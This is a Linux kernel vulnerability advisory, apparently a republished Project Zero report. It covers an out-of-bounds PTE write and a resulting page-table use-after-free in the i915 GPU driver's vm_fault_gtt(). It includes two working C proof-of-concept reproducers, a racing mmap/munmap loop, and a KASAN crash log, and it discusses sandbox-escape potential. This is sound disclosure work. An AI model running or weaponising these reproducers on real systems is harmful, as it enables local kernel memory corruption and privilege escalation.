Linux i915 PTE Use-After-Free

2024.09.24
Credit: Jann Horn
Risk: Medium
Local: Yes
Remote: No
CWE: N/A

I found a bug in the i915 code that allows a process with access to a render node (/dev/dri/renderD128) to corrupt kernel memory. This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2024-08-28. Summary vm_fault_gtt() calls remap_io_mapping with an incorrect size; it should limit the size to area->vm_end - {address passed to remap_io_mapping} instead of area->vm_end - area->vm_start. Bug description [For people reading this bug report who are not i915 experts: I highly recommend first reading sima's "i915/GEM Crashcourse" at https://blog.ffwll.ch/2013/01/i915gem-crashcourse-overview.html. I wouldn't have understood what's going on in this code without reading that.] I found a bug in vm_fault_gtt() in drivers/gpu/drm/i915/gem/i915_gem_mman.c. PTEs pointing into the GTT MMIO window are written as follows: /\* Now pin it into the GTT as needed \*/ vma = i915_gem_object_ggtt_pin_ww(obj, &ww, NULL, 0, 0, PIN_MAPPABLE | PIN_NONBLOCK /\* NOWARN \*/ | PIN_NOEVICT); if (IS_ERR(vma) && vma != ERR_PTR(-EDEADLK)) { /\* Use a partial view if it is bigger than available space \*/ struct i915_gtt_view view = compute_partial_view(obj, page_offset, MIN_CHUNK_PAGES); [...] vma = i915_gem_object_ggtt_pin_ww(obj, &ww, &view, 0, 0, flags); [...] } [...] /\* Finally, remap it using the new GTT offset \*/ ret = remap_io_mapping(area, area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT), (ggtt->gmadr.start + i915_ggtt_offset(vma)) >> PAGE_SHIFT, min_t(u64, vma->size, area->vm_end - area->vm_start), &ggtt->iomap); In the case where the first i915_gem_object_ggtt_pin_ww() call refuses to map the whole object into the GTT MMIO window, for example because the object is too big to fit into the window, a subrange of the object is mapped instead. When this happens and the subrange is not at the start of the VMA, vma->gtt_view.partial.offset is nonzero. In this case, the size parameter passed to remap_io_mapping() is calculated wrong: It is limited to the size of the VMA (area->vm_end - area->vm_start), but with an address that is higher than where the VMA starts (area->vm_start + (vma->gtt_view.partial.offset << PAGE_SHIFT)), so the end address is only limited to area->vm_end + (vma->gtt_view.partial.offset << PAGE_SHIFT). When the VMA covers the whole object, this has no bad consequences because of the min_t(); but if the VMA is shorter than the object, PTEs can be written out of bounds. This can be tested with the following reproducer - on my system it causes "BUG: Bad page map" and "Bug: Bad rss-counter" errors when the reproducer tries to exit: // written for a device with Xe Graphics (TGL GT2) #define _GNU_SOURCE #include <err.h> #include <fcntl.h> #include <stdio.h> #include <inttypes.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <drm/i915_drm.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) #define MiB \*(1024\*1024) void poke(volatile char \*p) { printf("poking %p\n", p); \*p = 1; } int main(void) { int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR)); struct drm_i915_gem_create gem_create = { .size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/ }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create)); printf("created GEM 0x%x\n", gem_create.handle); struct drm_i915_gem_mmap_offset mmap_offset_arg = { .handle = gem_create.handle, .flags = I915_MMAP_OFFSET_GTT }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg)); printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset); #define MAP_SIZE (128 MiB - 0x80000) volatile char \*map = (volatile char \*)SYSCHK(mmap(NULL, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd, mmap_offset_arg.offset)); printf("mapped from %p\n", map); poke(map + MAP_SIZE - 0x1000); poke(map); printf("mapped to %p\n", map + MAP_SIZE); } Code history The current form of the buggy code is from commit c58305af1835 ("drm/i915: Use remap_io_mapping() to prefault all PTE in a single pass", landed in v4.9), but I think back then it was unreachable because the code for constructing a partial view limited the partial view's size based on the VMA bounds back then: view.params.partial.size = min_t(unsigned int, chunk_size, (area->vm_end - area->vm_start) / PAGE_SIZE - view.params.partial.offset); This safety was removed in commit 8201c1fad4f4 ("drm/i915: Clip the partial view against the object not vma", first in v4.11). I suspect the bug became hittable after that point. Most places in the kernel that install PFNMAP PTEs use helpers like remap_pfn_range() that make sure the passed range fits into the specified VMA; but it looks like i915 doesn't use those because it wants to be able to clobber existing PTEs, which the usual helpers treat as an error. (See commit 0e4fe0c9f2f9 ("Revert "i915: use io_mapping_map_user"").) i915 instead uses its own helper remap_io_mapping(), which just writes PTEs in the specified virtual address range. Exploitability One consequence of this bug is that, because PFNMAP PTEs are written outside the region covered by the VMA, the MM subsystem can't shoot them down when the driver wants to revoke userspace's access to the region. So this could probably be used to gain access to memory that is later mapped into the GTT in the MMIO window - but I don't know enough about i915 to tell whether that is bad or whether shaders always have access to all GTT memory anyway. Probably another consequence would be that if you had a VMA at the end of the userspace virtual address space, you could get memory mapped into the kernel half of memory? But that probably wouldn't lead to anything overly bad... The one way I know of to turn this bug into something that is definitely bad is to turn it into page table UAF, like in https://crbug.com/project-zero/2350: When you're only holding the mmap_lock in read mode (like in a page fault handler), page tables that are not needed by any VMA can be freed concurrently. So if we have one GTT-backed VMA directly ahead of a second VMA, and then concurrently trigger a fault in the GTT-backed VMA while unmapping the second VMA, the out-of-bounds page table access off of the first VMA can walk page tables that are concurrently freed. I tested this in a v6.9.2 kernel build with CONFIG_KASAN=y (for detecting UAF access) and CONFIG_RCU_STRICT_GRACE_PERIOD=y (a debugging option that makes RCU grace periods much shorter at the expense of performance, which makes it easier to detect use-after-free bugs for objects that are RCU-freed), using the following reproducer, running on a system with Xe Graphics (TGL GT2): // written for a device with Xe Graphics (TGL GT2) #define _GNU_SOURCE #include <pthread.h> #include <err.h> #include <fcntl.h> #include <stdio.h> #include <inttypes.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <drm/i915_drm.h> #define SYSCHK(x) ({ \ typeof(x) __res = (x); \ if (__res == (typeof(x))-1) \ err(1, "SYSCHK(" #x ")"); \ __res; \ }) #define MiB \*(1024\*1024) // virtual address at the boundary between PGD entries #define PGD_BOUNDARY_ADDR 0x8000000000 #define MAP_SIZE (128 MiB - 0x80000) #define LEFT_MAPPING_ADDR (PGD_BOUNDARY_ADDR - MAP_SIZE) #define FLIPPER_MAP_SIZE 0x200000 static void \*flipper_thread_fn(void \*dummy) { int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR)); struct drm_i915_gem_create gem_create = { .size = FLIPPER_MAP_SIZE }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create)); printf("flipper created GEM 0x%x\n", gem_create.handle); struct drm_i915_gem_mmap_offset mmap_offset_arg = { .handle = gem_create.handle, .flags = I915_MMAP_OFFSET_GTT }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg)); printf("flipper fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset); while (1) { SYSCHK(mmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset)); SYSCHK(munmap((void\*)PGD_BOUNDARY_ADDR, FLIPPER_MAP_SIZE)); } return NULL; } int main(void) { pthread_t flipper_thread; if (pthread_create(&flipper_thread, NULL, flipper_thread_fn, NULL)) errx(1, "pthread_create"); int fd = SYSCHK(open("/dev/dri/renderD128", O_RDWR)); struct drm_i915_gem_create gem_create = { .size = 257 MiB /\* a bit over half the GGTT aperture size on my machine \*/ }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_CREATE, &gem_create)); printf("created GEM 0x%x\n", gem_create.handle); struct drm_i915_gem_mmap_offset mmap_offset_arg = { .handle = gem_create.handle, .flags = I915_MMAP_OFFSET_GTT }; SYSCHK(ioctl(fd, DRM_IOCTL_I915_GEM_MMAP_OFFSET, &mmap_offset_arg)); printf("fake mmap offset: 0x%lx\n", (unsigned long)mmap_offset_arg.offset); while (1) { SYSCHK(mmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED|MAP_FIXED_NOREPLACE, fd, mmap_offset_arg.offset)); \*(volatile char \*)(PGD_BOUNDARY_ADDR - 0x1000); SYSCHK(munmap((void\*)LEFT_MAPPING_ADDR, MAP_SIZE)); } } With that, I quickly got a KASAN splat (guess unwind lines removed): [ 906.394685] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF [ 906.657887] Huh VM_FAULT_OOM leaked out to the #PF handler. Retrying PF [ 906.819808] ================================================================== [ 906.819819] BUG: KASAN: use-after-free in pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416) [ 906.819827] Read of size 8 at addr ffff888180919000 by task linux-i915-oob-/3809 [ 906.819832] CPU: 3 PID: 3809 Comm: linux-i915-oob- Not tainted 6.9.2 #3 [ 906.819835] Hardware name: [...] [ 906.819838] Call Trace: [ 906.819839] <TASK> [ 906.819841] dump_stack_lvl (lib/dump_stack.c:117 (discriminator 1)) [ 906.819847] print_report (mm/kasan/report.c:378 mm/kasan/report.c:488) [ 906.819859] kasan_report (mm/kasan/report.c:603) [ 906.819865] pmd_install (./arch/x86/include/asm/pgtable_types.h:401 ./arch/x86/include/asm/pgtable.h:1024 mm/memory.c:416) [ 906.819869] __pte_alloc (mm/memory.c:445) [ 906.819886] __apply_to_page_range (mm/memory.c:2728 mm/memory.c:2788 mm/memory.c:2824 mm/memory.c:2860 mm/memory.c:2894) [ 906.819893] remap_io_mapping (drivers/gpu/drm/i915/i915_mm.c:110) [ 906.819905] vm_fault_gtt (drivers/gpu/drm/i915/gem/i915_gem_mman.c:411) [ 906.819924] __do_fault (mm/memory.c:4531) [ 906.819927] do_fault (mm/memory.c:4894 mm/memory.c:5024) [ 906.819931] __handle_mm_fault (mm/memory.c:3880 mm/memory.c:5300 mm/memory.c:5441) [ 906.819948] handle_mm_fault (mm/memory.c:5466 mm/memory.c:5622) [ 906.819951] do_user_addr_fault (arch/x86/mm/fault.c:1384) [ 906.819959] exc_page_fault (./arch/x86/include/asm/irqflags.h:37 ./arch/x86/include/asm/irqflags.h:72 arch/x86/mm/fault.c:1482 arch/x86/mm/fault.c:1532) [ 906.819963] asm_exc_page_fault (./arch/x86/include/asm/idtentry.h:623) [ 906.819967] RIP: 0033:0x561a370af516 [ 906.819970] Code: 48 83 7d e8 ff 75 19 48 8d 05 26 0d 00 00 48 89 c6 bf 01 00 00 00 b8 00 00 00 00 e8 64 fb ff ff 48 b8 00 f0 ff ff 7f 00 00 00 <0f> b6 00 be 00 00 f8 07 48 b8 00 00 08 f8 7f 00 00 00 48 89 c7 e8 All code ======== 0: 48 83 7d e8 ff cmpq $0xffffffffffffffff,-0x18(%rbp) 5: 75 19 jne 0x20 7: 48 8d 05 26 0d 00 00 lea 0xd26(%rip),%rax # 0xd34 e: 48 89 c6 mov %rax,%rsi 11: bf 01 00 00 00 mov $0x1,%edi 16: b8 00 00 00 00 mov $0x0,%eax 1b: e8 64 fb ff ff call 0xfffffffffffffb84 20: 48 b8 00 f0 ff ff 7f movabs $0x7ffffff000,%rax 27: 00 00 00 2a:\* 0f b6 00 movzbl (%rax),%eax <-- trapping instruction 2d: be 00 00 f8 07 mov $0x7f80000,%esi 32: 48 b8 00 00 08 f8 7f movabs $0x7ff8080000,%rax 39: 00 00 00 3c: 48 89 c7 mov %rax,%rdi 3f: e8 .byte 0xe8 Code starting with the faulting instruction =========================================== 0: 0f b6 00 movzbl (%rax),%eax 3: be 00 00 f8 07 mov $0x7f80000,%esi 8: 48 b8 00 00 08 f8 7f movabs $0x7ff8080000,%rax f: 00 00 00 12: 48 89 c7 mov %rax,%rdi 15: e8 .byte 0xe8 [ 906.819973] RSP: 002b:00007ffdd0b75430 EFLAGS: 00010213 [ 906.819976] RAX: 0000007ffffff000 RBX: 00007ffdd0b755a8 RCX: 00007f8a3a3848a3 [ 906.819978] RDX: 0000000000000003 RSI: 0000000007f80000 RDI: 0000007ff8080000 [ 906.819980] RBP: 00007ffdd0b75490 R08: 0000000000000003 R09: 0000000135188000 [ 906.819982] R10: 0000000000100001 R11: 0000000000000246 R12: 0000000000000000 [ 906.819984] R13: 00007ffdd0b755b8 R14: 0000561a370b1dd8 R15: 00007f8a3a4b9020 [ 906.819987] </TASK> [ 906.819990] The buggy address belongs to the physical page: [ 906.819992] page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x180919 [ 906.819994] flags: 0x4000000000000000(zone=1) [ 906.819997] page_type: 0xffffffff() [ 906.820000] raw: 4000000000000000 ffffea0006024688 ffffea0006024788 0000000000000000 [ 906.820002] raw: 0000000000000000 0000000000000001 00000000ffffffff 0000000000000000 [ 906.820004] page dumped because: kasan: bad access detected [ 906.820006] Memory state around the buggy address: [ 906.820008] ffff888180918f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 906.820010] ffff888180918f80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [ 906.820011] >ffff888180919000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 906.820013] ^ [ 906.820014] ffff888180919080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 906.820016] ffff888180919100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 906.820017] ================================================================== This bug is probably not very interesting on Linux servers, since access to the render node is typically only granted to UIDs who have locally signed in to a machine; but it is probably relevant for things like ChromeOS, and maybe also for escaping from some types of sandboxed desktop applications? Related CVE Number: CVE-2024-42259. Found by: jannh@google.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top